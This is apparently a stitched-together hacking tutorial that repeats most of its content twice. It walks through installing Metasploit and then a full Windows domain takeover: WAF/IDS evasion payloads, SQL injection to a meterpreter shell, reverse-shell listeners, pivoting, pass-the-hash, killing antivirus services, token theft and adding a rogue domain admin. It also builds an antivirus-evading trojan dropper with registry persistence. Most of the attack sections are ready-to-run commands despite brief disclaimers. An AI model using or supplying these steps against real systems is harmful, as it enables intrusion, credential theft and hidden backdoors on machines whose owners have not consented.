Metasploit

==========
Metasploit
==========

Install Metasploit
------------------

The Metasploit Framework is well-supported on the Ubuntu platform. The following instructions should also apply to Kubuntu, Xubuntu, and Debian.
 
In most cases, you should use the official binary installers, described in the Generic Linux instructions.  If for some reason, the installer does not work for you, the following instructions should get you up and running.
 
Dependencies
Install the Ruby dependencies:
 
 $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
 
Install the Subversion client:
 
 $ sudo apt-get install subversion
 
In order to build the native extensions (pcaprub, lorcon2, etc), the following packages need to be installed:
 
 $ sudo apt-get install build-essential ruby-dev libpcap-dev
 
Metasploit Framework
Once the dependencies have been installed, download the Unix tarball from the download page and run the following commands:
or 

Installing Metasploit Framework on Ubuntu

Recently, I had to install Metasploit Framework on Ubuntu. I thought I would document the instructions here. Be sure to check the downloads page on the Metasploit website (http://www.metasploit.com) to get the current version. At the time of this blog the latest version was 3.5.0.

wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2

$ bunzip2 framework-3.5.0.tar.bz2

$ tar xvf framework-3.5.0.tar

$ sudo mkdir -p /opt/metasploit3

$ sudo cp -a msf3/ /opt/metasploit3/msf3

$ sudo chown root:root -R /opt/metasploit3/msf3

$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/

$ sudo svn update /opt/msf3/

$ sudo crontab -e -u root # Enter "1 * * * * /usr/bin/svn update  /opt/msf3/ >> /var/log/msf3update.log 2>&1
 
 
When you've completed this step, you should have a working installation and be able to run modules, pivot through compromised systems, and use most of the Metasploit Framework's features. The following optional installation steps will give you extra functionality.
 
Database Configuration (optional)
Now that the framework is installed, you'll want to configure a database connection, and enable the Metasploit Framework to connect to it:
 
For postgres, see postgres_setup (recommended)
For mysql, see mysql_setup
 
Extensions (optional)
The Metasploit Framework includes a few native Ruby extensions that must be compiled in order to use certain types of modules.
 
To enable raw socket modules:
 
$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
 
To enable WiFi modules:
 
$ sudo bash
# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install
 
Updates

The Metasploit Framework is updated daily with the latest exploits, payloads, features, and bug fixes. To update your installation of the Metasploit Framework:
 
$ sudo svn update /opt/metasploit3/msf3/
 
This can also be installed into the root user's crontab:
 
$ sudo crontab -e -u root # enter the line below
1 * * * * /usr/bin/svn update  /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1


Identifying Load Balancers (Active Reconnaissance)
--------------------------------------------------
Most load-balancers are deployed for redundancy and performance improvement

As an attacker – load balancers are a headache.You have no idea where you packets are going....
There is absolutely no point in running tools against a host without knowing if a load balancer has been deployed.
so some time it shows iis 6 next time you load it shows iis 7 it might be load balance. brother...
 
step 1 is to determine if the host is load balanced....
Step 2 – determine what type of load balancing is in place (HTTP or DNS)

How can you tell if the target host is behind a load balancer?

Firefox LiveHTTP Headers

- https://addons.mozilla.org/en-US/firefox/addon/3829
- Look in HTTP header for modifications such as:

1. BIGipServerOS in cookie
2. nnCoection: close
3. Cneonction: close

dig

* Look for multiple addresses resolving to one domain name
* dig google.com

My favourate is Netcraft.com


Identifying Intrusion Prevention Systems
----------------------------------------
How can you tell if the target host protected an Intrusion Prevention System?

Curl: The netcat of the web app world

http://curl.haxx.se/

curl -i http://www.targetcompany.com/../../WINNT/system32/cmd.exe?d
curl -i http://www.targetcompany.com/type+c:\winnt\repair\sam._

Look for RSTs and no response....tcpdump/wireshark is your friend ;-)

Active Filter Detection
- http://www.purehacking.com/afd/downloads.php
- osstmm-afd -P HTTP -t targetcompany.com -v

Ok, so you're up against an IPS – relax...there are a few other things to consider.

HINT:
Most IDS/IPS solutions don't monitor SSL encrypted (actually any encrypted) traffic. because your attack is passing in form of encrypted traffic so for example i'm injecting sql inject query IDS dont see those because as said IDS only check for plain text traffic so you need to decrypt traffic using SSL accelarator in front of IDS so it can detect some suspicious traffic. Latest IDS are check for encrypted trffic also but more expansive.
I dont know why People pay for IPS and run IDS mode fucking Sheet hey dumb ass  turn on IPS  lets block some traffic.

SSL Accelerators are expensive so not everyone has one.


Identifying Web Application Firewalls
--------------------------------------

How can you determine if the target host has deployed a WAF?
* https://addons.mozilla.org/en-US/firefox/addon/3829

* Look in HTTP header for modifications such as:

1. Cookie Value has WAF info in it
- BIGipServerwww.google.com_pool_http
- barra_counter_session
- WODSESSION

2. Different server response code for hostile request
- 501 Method Not Implemented this error notify that victim probably deployed web app firewall (WAF)

3. Different "Server" response when hostile packet is sent

WAFs are surprisingly easy to detect?
-------------------------------------

Generally you just have to send 1 valid request, and one malicious request and diff the response.
Malicious tends to be any HTTP request that has a payload that contains things like:

   
    '  “ <  ?  #  -  |  ^  *

Bypassing Web Application Firewalls
-----------------------------------

How can you determine if the target host has deployed a WAF?
http://packetstormsecurity.org/web/unicode-fun.txt

[j0e@LinuxLaptop toolz]$ ruby unicode-fun.rb
Enter string to URL Unicode:<script>alert('XSS')</script>

%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff
54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff52
%uff49%uff50%uff54%u003e

Curl

curl -i http://www.targetcompany.com/3c%73%63%72%69%70%74%3e%61%6c
%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e
HTTP/1.1 404 Not Found
Date: Sat, 14 Mar 2009 19:13:10 GMT
Server: Apache


SQL Injection to Metasploit (SQLNinja)
--------------------------------------
cd /home/beatdown/toolz/sqlninja-0.2.3/

vi sqlninja.beatdown.conf

host = [target ip]

page = /vuln/vulnpage.asp

stringstart = VulnID=10;

lhost = [your ip]

device = eth0

msfpath = /home/beatdown/toolz/metasploit

resolvedip = [your ip]

./sqlninja -m t -f sqlninja.beatdown.conf (test for injection)
./sqlninja -m f -f sqlninja.beatdown.conf (fingerprint the backend db)
./sqlninja -m u -f sqlninja.beatdown.conf (upload dnstun, netcat, or meterpreter)
./sqlninja -m s -f sqlninja.beatdown.conf (drop a shell)

cd /home/beatdown/toolz/sqlmap-dev

python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-shell -v 1
os-shell>

python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-pwn --msf-path /home/beatdown/toolz/metasploit --priv-esc -v 10
meterpreter>

Getting in via client-side (client side Attack)
-----------------------------------------------

sudo ./msfconsole

Be sure to run as root so you can set the LPORT to 443
use exploit/[name of newest browser, PDF, ActiveX, or fileformat exploit]

set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST [your public ip]
set LPORT 443
exploit -j

Pivoting In Lan Through Web
---------------------------

Pivot Attack: Using a compromised host as a launching point to attack other hosts...
......set up standard exploit
exploit
route
ctrl-z <-- background the session

back <--- you need to get to main msf> prompt

Now set up Pivot with a route add
route add 192.168.10.131 255.25.255.0 1 <-- Use correct session id

route print <----- verify

use exploit/windows/smb/ms08_067_dcom
set PAYLOAD windows/shell/bind_tcp
set RHOST 192.168.10.132
set LPORT 1234

ctrl-z <-- background the session
back <--- you need to get to main msf> prompt

Run auxillaries & exploits through your pivot
use scanner/smb/version
set RHOSTS 192.168.10.1/24
run

Common LAN Security Solutions
-----------------------------

Can’t get on the network?????

1. NO DHCP – static IP addresses
2. DHCP MAC Address reservations
3. Port Security

Can’t get on the network?????

1. NO DHCP – static IP addresses
    -> Steal valid IP address from host

2. DHCP MAC Address reservations
    -> Steal valid MAC address

3. Port Security
    -> Steal valid MAC/IP address

Enumerating The Internal Network Against NIPS/HIPS
--------------------------------------------------

c:\set
c:\net view
c:\net view /domain
c:\net user
c:\net user /domain
c:\net localgroup
c:\net localgroup /domain
c:\net localgroup administrators
c:\net localgroup administrators /domain
c:\net group "Company Admins" /domain
c:\net user "joe.mccray" /domain
c:\nltest /dclist:

Use SET to get domain information and username

Use NET VIEW to get computers in the users domain and other domains

Use NET VIEW to get computers in other domains

Use NET USER to get local users on the computer you are on

All users in the current user's domain

Use NET LOCALGROUP to get the local groups on the computer

Use NET LOCALGROUP to get the domain groups

All users in the local administrators group

All users in the domain administrators group

All users in the "Company Admins" group

All info about this user

List Domain Controllers...

Basically browsing network neighborhood, and querying Active Directory will always be considered legitimate traffic
to an NIPS so you can use NET commands to enumerate a network without port scanning.

Looking Around the Network For A User
-------------------------------------

Some commands to identify a logged in user

NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"

WMIC /Node:remotecomputer ComputerSystem Get UserName

PSLOGGEDON -L \\remotecomputer

PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "

PSEXEC \\remotecomputer NET NAME

PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"


Smoking some MSF hash: Moving around the network using password hashes
----------------------------------------------------------------------

use exploit/windows/smb/psexec

set RHOST 192.168.10.20

set SMBUser administrator

set SMBPass 01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537

set PAYLOAD windows/shell/reverse_tcp

set LHOST 192.168.10.10

exploit

Killing The HIPS (as SYSTEM with “at” command)
----------------------------------------------
1. Stop the overall AV Framework
net stop "McAfee Framework Service"

2. Stop the HIPS
net stop hips
net stop enterceptagent
net stop firepm

3. McAfee Processes
pskill -t UdaterUI
pskill -t TBMon
pskill -t Mcshield
pskill -t VsTskMgr
pskill -t shstat

4. HIPS Processes
pskill -t firetray

or get system from meterpreter latest ver of metasploit do all for you withing one command

Stealing a domain administrator's token....
-------------------------------------------
meterpreter> use incognito

meterpreter> list_tokens -u

meterpreter> impersonate_token "domain\\user"

meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token

or

meterpreter > list_tokens -g

meterpreter > impersonate_token "DOMAIN\\Domain Admins"

meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token

Add yourself to the Domain Admin's group

c:\net user j0e j0eR0ck$ /domain /add

c:\net localgroup administrators j0e /domain /add 

Learn metasploit client side Attack

This is for educational purposes only

Today i show you how to create a trojan/dropper for metasploit and how to backdoor Windows with it.

Here is the method I present to you but I am not the author of this video:

http://www.securitytube.net/video/3745

Operating systems used

Backtrack 5 R2 = Attacker(192.168.1.97)
Windows XP sp3

Operating systems vulnerable

Windows 7 and Xp Any Versions = Slave (192.168.1.7)

Software requirements

Dev-C + + Version 4.9.9.2 (in XP)
The Source Code of the video.

1 - Create the file ascii.bin

Launch this command in a console on Backtrack :

Code:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.97 LPORT=4444 R|msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X> /root/Desktop/ascii.bin

And copy the ascii.bin in /var/www

Code:

Pixo@Backtrack 5 R2# cp /root/Desktop/ascii.bin /var/www

2-Create the trojan/dropper

In Win XP open Dev-C ++ and click on file => new => project

Spoiler (Click to View)

Select empty project and name it

Spoiler (Click to View)

Then create a new source file

Spoiler (Click to View)

Click on file => save as, and name it

Spoiler (Click to View)

Go to

Code:

http://www.el-palomo.com/wp-content/uploads/2012/03/codigoC.txt

Copy and Paste the Code

Spoiler (Click to View)

Now replace the ip address with backtrack ip address

Spoiler (Click to View)

Open the options of project

Spoiler (Click to View)

Add a link for wininet with the -lwininet command

Spoiler (Click to View)

For the console is not visible this option is added

Spoiler (Click to View)

Here you can compil your Trojan/Dropper

Spoiler (Click to View)

3-Get a Meterpreter

Start the listener with this command

Code:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E

Spoiler (Click to View)

You can use all of method you want to get a meterpreter.

You can social and send your dropper.

Spoiler (Click to View)

-For add a icon for your dropper you can use the method used in this thread

You can exploit a vulnerability.

4-Create the persistent backdoor

(I know the script persistence.rb there, but I wanted to do a backdoor persistent and undetectable as possible by the antivirus)

If you use the method for add an icon you can add %windir%\system32 in the extract dir.

If you not you can use the meterpreter for upload your dropper with this command:

Code:

meterpreter> upload /root/exec.exe C:\\Windows\\system32\\

Add an entry in the register for launch your dropper at windows start

Code:

meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v exec -d '"c:\windows\system32\exec.exe"'

Check the register

Code:

meterpreter>reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

During the reboot restart your listener

Code:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E

You may find your Meterpreter restarts automatically soon as a session is opened.

Conclusion

From here you are the master on board.

I hope you enjoy it and I'm always looking for a way to inject shellcode into an image and if possible make it undetectable.
You will find links who talk about it on my other TuT all methods of evasion antivirus with metasploit

Analysis :
ascii.bin : https://www.virustotal.com/file/3a2976ff...334400026/
exec.exe : https://www.virustotal.com/file/da1ba033...334409609/

===================================================
Take Over Entire Windows Domain with Metasploit and sql injection
===================================================

This is Only for Pen-Testing and security testing purpose illegal use of this concept can be prosecuted

Install Metasploit

-------------------------

The Metasploit Framework is well-supported on the Ubuntu platform. The following instructions should also apply to Kubuntu, Xubuntu, and Debian.
 
In most cases, you should use the official binary installers, described in the Generic Linux instructions.  If for some reason, the installer does not work for you, the following instructions should get you up and running.
 
Dependencies
Install the Ruby dependencies:
 
 $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
 
Install the Subversion client:
 
 $ sudo apt-get install subversion
 
In order to build the native extensions (pcaprub, lorcon2, etc), the following packages need to be installed:
 
 $ sudo apt-get install build-essential ruby-dev libpcap-dev
 
Metasploit Framework
Once the dependencies have been installed, download the Unix tarball from the download page and run the following commands:
or 

Installing Metasploit Framework on Ubuntu

Recently, I had to install Metasploit Framework on Ubuntu. I thought I would document the instructions here. Be sure to check the downloads page on the Metasploit website (http://www.metasploit.com) to get the current version. At the time of this blog the latest version was 3.5.0.

wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2

$ bunzip2 framework-3.5.0.tar.bz2

$ tar xvf framework-3.5.0.tar

$ sudo mkdir -p /opt/metasploit3

$ sudo cp -a msf3/ /opt/metasploit3/msf3

$ sudo chown root:root -R /opt/metasploit3/msf3

$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/

$ sudo svn update /opt/msf3/

$ sudo crontab -e -u root # Enter "1 * * * * /usr/bin/svn update  /opt/msf3/ >> /var/log/msf3update.log 2>&1
 
 
When you've completed this step, you should have a working installation and be able to run modules, pivot through compromised systems, and use most of the Metasploit Framework's features. The following optional installation steps will give you extra functionality.
 
Database Configuration (optional)
Now that the framework is installed, you'll want to configure a database connection, and enable the Metasploit Framework to connect to it:
 
For postgres, see postgres_setup (recommended)
For mysql, see mysql_setup
 
Extensions (optional)
The Metasploit Framework includes a few native Ruby extensions that must be compiled in order to use certain types of modules.
 
To enable raw socket modules:
 
$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
 
To enable WiFi modules:
 
$ sudo bash
# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install
 
Updates

The Metasploit Framework is updated daily with the latest exploits, payloads, features, and bug fixes. To update your installation of the Metasploit Framework:
 
$ sudo svn update /opt/metasploit3/msf3/
 
This can also be installed into the root user's crontab:
 
$ sudo crontab -e -u root # enter the line below
1 * * * * /usr/bin/svn update  /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1


Identifying Load Balancers (Active Reconnaissance)
-----------------------------------------------------------------------------
Most load-balancers are deployed for redundancy and performance improvement

As an attacker – load balancers are a headache.You have no idea where you packets are going....
There is absolutely no point in running tools against a host without knowing if a load balancer has been deployed.
so some time it shows iis 6 next time you load it shows iis 7 it might be load balance. brother...
 
step 1 is to determine if the host is load balanced....
Step 2 – determine what type of load balancing is in place (HTTP or DNS)

How can you tell if the target host is behind a load balancer?

Firefox LiveHTTP Headers

- https://addons.mozilla.org/en-US/firefox/addon/3829
- Look in HTTP header for modifications such as:

1. BIGipServerOS in cookie
2. nnCoection: close
3. Cneonction: close

dig

* Look for multiple addresses resolving to one domain name
* dig google.com

My favourate is Netcraft.com


Identifying Intrusion Prevention Systems
------------------------------------------------------------
How can you tell if the target host protected an Intrusion Prevention System?

Curl: The netcat of the web app world

http://curl.haxx.se/

curl -i http://www.targetcompany.com/../../WINNT/system32/cmd.exe?d
curl -i http://www.targetcompany.com/type+c:\winnt\repair\sam._

Look for RSTs and no response....tcpdump/wireshark is your friend ;-)

Active Filter Detection
- http://www.purehacking.com/afd/downloads.php
- osstmm-afd -P HTTP -t targetcompany.com -v

Ok, so you're up against an IPS – relax...there are a few other things to consider.

HINT:
Most IDS/IPS solutions don't monitor SSL encrypted (actually any encrypted) traffic. because your attack is passing in form of encrypted traffic so for example i'm injecting sql inject query IDS dont see those because as said IDS only check for plain text traffic so you need to decrypt traffic using SSL accelarator in front of IDS so it can detect some suspicious traffic. Latest IDS are check for encrypted trffic also but more expansive.
I dont know why People pay for IPS and run IDS mode fucking Sheet hey dumb ass  turn on IPS  lets block some traffic.

SSL Accelerators are expensive so not everyone has one.


Identifying Web Application Firewalls
--------------------------------------------------------

How can you determine if the target host has deployed a WAF?
* https://addons.mozilla.org/en-US/firefox/addon/3829

* Look in HTTP header for modifications such as:

1. Cookie Value has WAF info in it
- BIGipServerwww.google.com_pool_http
- barra_counter_session
- WODSESSION

2. Different server response code for hostile request
- 501 Method Not Implemented this error notify that victim probably deployed web app firewall (WAF)

3. Different "Server" response when hostile packet is sent

WAFs are surprisingly easy to detect?
-------------------------------------------------------

Generally you just have to send 1 valid request, and one malicious request and diff the response.
Malicious tends to be any HTTP request that has a payload that contains things like:

   
    '  “ <  ?  #  -  |  ^  *

Bypassing Web Application Firewalls
--------------------------------------------------------

How can you determine if the target host has deployed a WAF?
http://packetstormsecurity.org/web/unicode-fun.txt

[sam@LinuxLaptop toolz]$ ruby unicode-fun.rb
Enter string to URL Unicode:<script>alert('XSS')</script>

%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff
54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff52
%uff49%uff50%uff54%u003e

Curl

curl -i http://www.targetcompany.com/3c%73%63%72%69%70%74%3e%61%6c
%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e
HTTP/1.1 404 Not Found
Date: Sat, 14 Mar 2009 19:13:10 GMT
Server: Apache


SQL Injection to Metasploit (SQLNinja)
----------------------------------------------------------
cd /home/beatdown/toolz/sqlninja-0.2.3/

vi sqlninja.beatdown.conf

host = [target ip]

page = /vuln/vulnpage.asp

stringstart = VulnID=10;

lhost = [your ip]

device = eth0

msfpath = /home/beatdown/toolz/metasploit

resolvedip = [your ip]

./sqlninja -m t -f sqlninja.beatdown.conf (test for injection)
./sqlninja -m f -f sqlninja.beatdown.conf (fingerprint the backend db)
./sqlninja -m u -f sqlninja.beatdown.conf (upload dnstun, netcat, or meterpreter)
./sqlninja -m s -f sqlninja.beatdown.conf (drop a shell)

cd /home/beatdown/toolz/sqlmap-dev

python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-shell -v 1
os-shell>

python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-pwn --msf-path /home/beatdown/toolz/metasploit --priv-esc -v 10
meterpreter>

Getting in via client-side (client side Attack)
-----------------------------------------------------------------

sudo ./msfconsole

Be sure to run as root so you can set the LPORT to 443
use exploit/[name of newest browser, PDF, ActiveX, or fileformat exploit]

set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST [your public ip]
set LPORT 443
exploit -j

Pivoting In Lan Through Web
--------------------------------------------

Pivot Attack: Using a compromised host as a launching point to attack other hosts...
......set up standard exploit
exploit
route
ctrl-z <-- background the session

back <--- you need to get to main msf> prompt

Now set up Pivot with a route add
route add 192.168.10.131 255.25.255.0 1 <-- Use correct session id

route print <----- verify

use exploit/windows/smb/ms08_067_dcom
set PAYLOAD windows/shell/bind_tcp
set RHOST 192.168.10.132
set LPORT 1234

ctrl-z <-- background the session
back <--- you need to get to main msf> prompt

Run auxillaries & exploits through your pivot
use scanner/smb/version
set RHOSTS 192.168.10.1/24
run

Common LAN Security Solutions
--------------------------------------------------

Can’t get on the network?????

1. NO DHCP – static IP addresses
2. DHCP MAC Address reservations
3. Port Security

Can’t get on the network?????

1. NO DHCP – static IP addresses
    -> Steal valid IP address from host

2. DHCP MAC Address reservations
    -> Steal valid MAC address

3. Port Security
    -> Steal valid MAC/IP address

Enumerating The Internal Network Against NIPS/HIPS
--------------------------------------------------------------------------------

c:\set
c:\net view
c:\net view /domain
c:\net user
c:\net user /domain
c:\net localgroup
c:\net localgroup /domain
c:\net localgroup administrators
c:\net localgroup administrators /domain
c:\net group "System Admins" /domain
c:\net user "ajit.patel" /domain
c:\nltest /dclist:

Use SET to get domain information and username

Use NET VIEW to get computers in the users domain and other domains

Use NET VIEW to get computers in other domains

Use NET USER to get local users on the computer you are on

All users in the current user's domain

Use NET LOCALGROUP to get the local groups on the computer

Use NET LOCALGROUP to get the domain groups

All users in the local administrators group

All users in the domain administrators group

All users in the "Company Admins" group

All info about this user

List Domain Controllers...

Basically browsing network neighborhood, and querying Active Directory will always be considered legitimate traffic
to an NIPS so you can use NET commands to enumerate a network without port scanning.

Looking Around the Network For A User
-----------------------------------------------------------

Some commands to identify a logged in user

NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"

WMIC /Node:remotecomputer ComputerSystem Get UserName

PSLOGGEDON -L \\remotecomputer

PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "

PSEXEC \\remotecomputer NET NAME

PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"


Smoking some MSF hash: Moving around the network using password hashes
-------------------------------------------------------------------------------------------------------------------

use exploit/windows/smb/psexec

set RHOST 192.168.10.20

set SMBUser administrator

set SMBPass 01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537

set PAYLOAD windows/shell/reverse_tcp

set LHOST 192.168.10.10

exploit

Killing The HIPS (as SYSTEM with “at” command)
----------------------------------------------------------------------------------

1. Stop the overall AV Framework
net stop "McAfee Framework Service"

2. Stop the HIPS
net stop hips
net stop enterceptagent
net stop firepm

3. McAfee Processes
pskill -t UdaterUI
pskill -t TBMon
pskill -t Mcshield
pskill -t VsTskMgr
pskill -t shstat

4. HIPS Processes

pskill -t firetray

or get system from meterpreter latest ver of metasploit do all for you withing one command

Stealing a domain administrator's token....
---------------------------------------------------------------
meterpreter> use incognito

meterpreter> list_tokens -u

meterpreter> impersonate_token "domain\\user"

meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token

or

meterpreter > list_tokens -g

meterpreter > impersonate_token "DOMAIN\\Domain Admins"

meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token

Add yourself to the Domain Admin's group

c:\net user sam samrocks$ /domain /add

c:\net localgroup administrators sam /domain /add

Great Thanks to Joe McCray